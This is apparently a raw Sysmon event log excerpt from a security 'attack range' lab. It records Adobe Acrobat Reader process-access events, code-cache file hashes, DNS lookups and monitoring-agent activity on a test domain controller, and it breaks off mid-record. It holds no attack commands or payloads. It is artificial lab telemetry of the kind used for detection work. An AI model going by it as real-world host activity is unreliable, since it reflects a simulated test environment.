DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.371{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.119{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0MD5=322CE9A7BF3443BE9CF15C5F0124765B,SHA256=6CB7362D18CA3A22657C73C9BC1FCDBA9D147F784C3CC53382D1C80C03225CE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.119{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0MD5=35EAF3329C5D5A5513C7474C3CA235C8,SHA256=E1D1A22F4EE5ACA94779AB1B373FF57EEC0B52B51E4791ED6D928FACC832B5F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.116{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0MD5=EFC37A9D9D91D266D8C68AC32CE9D3FB,SHA256=5F63628EC7062C0E34EAC243C75CA7E1086B6D55DFE131467F8F4CB26071E590,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.114{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0MD5=32845AEC93666026538B50E748D8E278,SHA256=DA754FD8D206F354F528E2804F5C05451EC6DA9F3FDF5F2E0C5E9576EE8019CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.112{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0MD5=5CB884C9E7E3140C9AD77B79B93185BD,SHA256=4A89DA1C0E05DA6EE1FF630F75C9BC820E514BD6966DB2B44A00D59A936397AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.112{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0MD5=1951575C32849903A85A68B24F7EF2C2,SHA256=AE1DAE841A3F2BD68F27564306D9B108EEF14DFF0426BCF10F004167270F45C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.111{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0MD5=4D5B171BB79653A96ABADBC01F6E675B,SHA256=B5D7090B3B58269B635ABE557BCF61DBFE8258E9F7374ECB48A74ADE7BB6EEBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.109{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0MD5=4C8F4513AB685D31EB3193C0C5F16840,SHA256=33F939F7CA2546E869B135158C0BEA6FF085703A9BC3CDBD4AFD4E065195B823,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.109{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0MD5=7073F097AC63E3665B101CBD2CB9F1DE,SHA256=DF6C0C0AAAE4A76ABA03064812386F4351285BA4DD38B97784D8C387459BD9C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.109{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0MD5=B1263E23A3ECB16FBC128FCF598DEE69,SHA256=3A6D1206BAF2F6F02CF9E2A552D6FD2400B51E966098FB0672B7DD8E860AA1C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.092{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0MD5=512FB66CDC8E26CE43E8DA1364805038,SHA256=8B068BF850D316259E2A0741A077B9E460F29C80F6A01B25A3CCDC0D2C837B1D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.092{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0MD5=3070A4A9F6F69A990F6D5C4ED93D907D,SHA256=5086A9CBDB8B975D046C44D3A3D5F0E4F0B9EFA58BEDBE85D16CF092238DD801,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.092{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0MD5=5E6D9BF8967A207EC4EA71A7C77AC72D,SHA256=AE0462BF3807FBFF6B3ED5781919D359A400EB1E318B7E5925D342FAFB9064B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:20.051{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.991{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB555AA31169ECDDFA1CF9B33040316,SHA256=24FD6CC3178BC242754C0425EC3F1FD03BDE4215DAC491488D9775727A4EDB48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000047432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.339{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60040- 354300x800000000000000047431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.314{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60040- 354300x800000000000000047430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:19.314{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62815- 23542300x800000000000000018742Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:21.686{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-041MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018741Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:19.087{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50194-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000047429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.648{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0MD5=6C830B46A77846E3711F20B63F1F6F7D,SHA256=36FE26A9DD54A0115BA778EB3048570326819940ECCD4D1CB373C84DC997B9CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.648{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0MD5=4976BEFDBD4D8182B3675BAADE5D6BC7,SHA256=B729AE526F86282782C766C14C4CB48E98B4F4B485BC20E60484009998A82131,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.647{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0MD5=C23EC338663E99B011843A9B4054F3A4,SHA256=69249B967CA42EB4FE53605EF988FB0EAAD0E46A3CDA9718EDB232C165C24C04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.647{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0MD5=1BB6B334235D37B2285A5373987B9535,SHA256=EA1177BBF43350F86D29EAAAF04BC1D99ED6000AD6B635412CA906599AF2E309,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.602{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0MD5=1066B309676B3D8182929F4C58404EDE,SHA256=E9ED4E6B47147E7B83FF53E7C23AF5F50E8146D65A8D306B2F704ECCC7151244,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.602{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0MD5=66E80E15540598741DF31AA6407E3BFC,SHA256=8A1CD124A162BF22FCD06E46DF30B3F3EE801F4E1C219114090835A95A7A2DC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.601{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0MD5=AAF6F353B9232BB9DF35294C7B82A1FC,SHA256=579F50735B9AEDCA67C0F3848B81DE8F63E1513C8EF7319DFCC30D9281F65885,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.547{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0MD5=DA8494BFF934B38EEDC484539F99B54C,SHA256=213A83E2F3948290B1BEA509542D4225C3FB8A1F19F99230652A7C395CEC479B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.547{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0MD5=11F289285CF8855C7A2EC54C36F802A0,SHA256=C746C21C87BFA5BCCAD160B613ABD89F54258BF4502E22AD1EADF78D96291C84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.544{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0MD5=8FED5D43D56E49B5F30E1C3B6E3B9750,SHA256=323FEAE50CD37B41F37B16CCBC0340DE15D02CE3213CB4F223FF048E000D214A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.544{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0MD5=9BB5449C9E71FCBA1F8CE8D73D79844D,SHA256=60A2C4E3F8DAFD69F1B446C5A8A661B84C4A2C488F400790127C292283FF35AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.543{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0MD5=A3BEDB4A5787F9E2A89FFEC31E521980,SHA256=C8C37D85D4CA4BE9190F01FFB767744ACB997306E0DA178CF176B8DBE36A103E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.543{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0MD5=4456970F1E409872F50485341F4102EE,SHA256=2804E45D968EEA438A01043D32350991B78DB5DCE29C0CFE15B27E38AEE17E6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000047416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:18.341{FE4C2B44-E652-63C7-8C06-00000000AF02}7044wpad9003-C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.451{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 